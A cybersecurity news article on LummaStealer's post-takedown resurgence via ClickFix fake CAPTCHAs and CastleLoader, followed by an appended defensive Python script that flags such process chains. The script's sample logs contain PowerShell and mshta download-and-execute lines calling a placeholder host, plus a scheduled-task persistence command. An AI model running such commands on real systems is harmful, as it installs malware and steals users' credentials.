SecurityBrief Australia - Technology news for CISOs & cybersecurity decision-makers

LummaStealer returns post-takedown with ClickFix ruse

Fri, 13th Feb 2026

Bitdefender has reported a renewed surge in LummaStealer infections, with attackers using fake CAPTCHA pages and prompting users to execute commands months after a law enforcement action disrupted thousands of domains tied to the operation.

After a major 2025 takedown that disrupted more than 2,300 command-and-control domains, the LummaStealer ecosystem rebuilt quickly. Bitdefender reported a shift to bulletproof hosting providers, along with new loaders and delivery techniques.

LummaStealer is an information-stealing malware family that targets Windows systems. It collects credentials, session data and other sensitive information that can be reused for account takeovers and financial theft.

Social engineering

Current campaigns rely more on social engineering than software vulnerabilities, according to Bitdefender. Victims are typically infected after choosing to run a malicious file or following instructions that trigger attacker-supplied commands.

Attackers continue to use familiar lures, including fake cracked software and bogus game or media downloads. Newly released movie downloads also appear, along with abuse of trusted platforms as distribution channels.

Bitdefender noted that people seeking pirated or unofficial software often expect security warnings. That expectation can lead them to dismiss alerts that would otherwise raise suspicion.

Fake CAPTCHAs

A growing number of campaigns use fake CAPTCHA pages, a tactic often referred to as "ClickFix". The approach turns a routine web interaction into direct command execution on the victim's system.

In these scenarios, the victim is instructed to paste and run the clipboard content. The malicious site has already placed a PowerShell command on the clipboard. When the user executes it, the command retrieves and runs the next stage from attacker-controlled infrastructure.

Bitdefender described the method as one that depends on procedural trust and familiar-looking steps. Because no software flaw is required for initial access, traditional patching is less effective as a primary defence.

CastleLoader link

Bitdefender linked much of the recent increase in LummaStealer activity to CastleLoader, a modular loader used to deliver the malware. The loader uses scripts and runs in stages.

CastleLoader decrypts and loads payloads in memory, and establishes persistence by creating Startup shortcuts and scheduled tasks. Bitdefender added that it uses flexible command-and-control communication to support broad malware distribution and follow-on payload delivery.

Attackers also abuse legitimate Windows utilities and so-called living-off-the-land binaries. This blends malicious actions with normal operating system activity and complicates detection.

Bitdefender observed infrastructure overlap between CastleLoader and LummaStealer, including shared domains and hosting resources. The overlap suggests coordination between developer teams or the use of shared service providers within a broader malware-as-a-service marketplace.

Service model

LummaStealer has operated as malware-as-a-service since emerging in late 2022. Bitdefender said subscription pricing in 2023 ranged from $250 to $20,000 for premium packages, pointing to a tiered commercial structure for criminal affiliates.

During the one-month period between December 12 and January 12, Bitdefender observed active infections globally. The highest concentration was in India, followed by the United States and parts of Europe. Targeting can shift quickly because affiliates decide where to focus distribution.

Once installed, LummaStealer gathers browser-stored credentials and authentication cookies, active session tokens and two-factor authentication tokens. It also targets cryptocurrency wallets and private keys, as well as password manager data and remote access tool data.

The malware can also collect email and FTP client credentials, VPN configuration files, personal documents and financial records, and system metadata such as operating system version and installed apps. Bitdefender also cited Discord and Steam data collection in cases where CastleLoader is part of the infection chain.

Impact and response

Stolen credentials and sessions can enable account takeover without password resets triggering alerts, Bitdefender said. Compromised email accounts can then be used to reset access to other services. Stolen cryptocurrency data can lead to direct theft or resale on criminal marketplaces.

Because the infection chain depends heavily on user interaction, Bitdefender urged a combined focus on behavioural awareness and technical controls. Users should avoid untrusted download sources, especially those advertising cracked or free software, games or media.

It also warned that any website instructing users to manually execute PowerShell or command-line instructions should be treated as malicious by default.

Remediation should go beyond removing the malware. Bitdefender recommended rotating passwords and invalidating active sessions, prioritising email, financial and work-related accounts. In some cases, a full operating system reinstall may be required.

For organisations, Bitdefender pointed to multi-factor authentication, user education on social engineering, and behavioural detection that flags suspicious process chains, abuse of legitimate system tools, anomalous DNS activity consistent with CastleLoader behaviour, and unusual authentication patterns.
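As an added example (not Bitdefender's or this article's code), the following detection pass applies the behavioural checks described above to constructed process-creation records: the ClickFix chain from the earlier section, where an interactive parent such as explorer.exe or a browser launches a script host with a download-and-execute command line, and CastleLoader-style persistence through scheduled tasks or Startup shortcuts. The event format, image names and sample lines are assumptions.

```python
"""Flag ClickFix-style process chains and loader-style persistence in
process-creation logs. Added example, not Bitdefender's or the article's
code; the event format and the sample lines are constructed."""
import re
from dataclasses import dataclass

# Constructed sample events: parent image | image | command line.
# Real telemetry would come from Sysmon Event ID 1 or EDR process records.
SAMPLE_EVENTS = """\
explorer.exe|powershell.exe|powershell -w hidden -c "iwr http://example.invalid/a|iex"
explorer.exe|powershell.exe|powershell -ep bypass -enc QUJD
chrome.exe|mshta.exe|mshta http://example.invalid/verify.hta
powershell.exe|schtasks.exe|schtasks /create /sc minute /mo 5 /tn Updater /tr C:\\Users\\u\\AppData\\Roaming\\x.exe
services.exe|svchost.exe|svchost.exe -k netsvcs
explorer.exe|powershell.exe|powershell Get-ChildItem C:\\Temp
"""

@dataclass
class Finding:
    rule: str
    parent: str
    image: str
    cmdline: str

# Parents a pasted command runs under (Run dialog via explorer.exe, or a browser).
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Script hosts and living-off-the-land binaries typically launched by the pasted command.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Markers of fetching, decoding or hiding the next stage in the command line.
DOWNLOAD_EXEC = re.compile(
    r"(iwr|invoke-webrequest|downloadstring|iex|invoke-expression|https?://|\s-enc\s|-w\s+hidden)", re.I)
# Persistence via scheduled task creation or a shortcut dropped in the Startup folder.
PERSIST = re.compile(r"(schtasks(\.exe)?\s+/create|\\Start Menu\\Programs\\Startup\\)", re.I)

def parse_events(text: str):
    """Yield (parent, image, cmdline) tuples; the command line may itself contain '|'."""
    for line in text.splitlines():
        if line.strip():
            parent, image, cmd = line.split("|", 2)
            yield parent.lower(), image.lower(), cmd

def detect(text: str) -> list[Finding]:
    findings = []
    for parent, image, cmd in parse_events(text):
        # Rule 1: ClickFix chain, an interactive parent spawns a script host whose
        # command line fetches, decodes or hides the next stage.
        if parent in INTERACTIVE_PARENTS and image in SCRIPT_HOSTS and DOWNLOAD_EXEC.search(cmd):
            findings.append(Finding("clickfix_chain", parent, image, cmd))
        # Rule 2: loader-style persistence, regardless of parent.
        if PERSIST.search(cmd):
            findings.append(Finding("persistence", parent, image, cmd))
    return findings
```

The benign explorer.exe to powershell.exe line is deliberately left unflagged: the chain alone is noisy on admin workstations, so the rule requires a download-and-execute marker as well.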

Bitdefender researchers said that because LummaStealer relies heavily on user interaction, mitigation requires behavioural awareness alongside technical controls.

Bitdefender said the continued use of ClickFix and CastleLoader reflects a shift toward delivery methods that are harder to disrupt through domain takedowns and signature-based detection, with attackers increasingly presenting initial access as routine user behaviour.